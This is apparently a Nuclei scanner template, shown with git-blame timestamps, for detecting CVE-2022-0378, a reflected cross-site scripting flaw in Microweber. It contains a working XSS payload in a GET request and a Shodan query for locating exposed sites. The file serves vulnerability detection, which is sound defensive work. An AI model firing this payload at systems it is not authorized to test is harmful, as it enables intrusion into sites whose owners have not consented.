2022-02-06 05:41:20 +00:00
|
|
|
id: CVE-2022-0378
|
|
|
|
|
|
|
|
info:
|
2022-09-09 17:34:37 +00:00
|
|
|
name: Microweber Cross-Site Scripting
|
2022-02-06 05:41:20 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: medium
|
2022-02-28 20:58:49 +00:00
|
|
|
description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
|
2022-02-06 05:41:20 +00:00
|
|
|
reference:
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0378
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
|
|
|
|
- https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31
|
2022-02-06 18:32:16 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 5.4
|
2022-02-06 18:32:16 +00:00
|
|
|
cve-id: CVE-2022-0378
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
metadata:
|
|
|
|
shodan-query: http.favicon.hash:780351152
|
2022-08-27 04:41:18 +00:00
|
|
|
tags: cve,cve2022,microweber,xss,huntr
|
2022-02-06 05:41:20 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2022-02-06 18:29:47 +00:00
|
|
|
- '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x'
|
2022-02-06 05:41:20 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2022-02-06 18:29:47 +00:00
|
|
|
- 'mwui_init'
|
2022-02-06 05:41:20 +00:00
|
|
|
- 'onmousemove="alert(document.domain)'
|
|
|
|
condition: and
|
2022-02-28 20:58:49 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/02/28
|